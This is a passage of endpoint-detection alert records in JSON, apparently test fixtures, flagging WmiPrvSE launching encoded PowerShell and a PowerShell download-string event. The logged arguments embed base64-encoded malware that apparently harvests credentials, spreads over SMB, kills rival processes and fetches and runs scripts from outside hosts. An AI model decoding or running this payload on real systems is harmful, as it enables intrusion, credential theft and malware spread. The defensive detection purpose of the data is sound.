ZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBj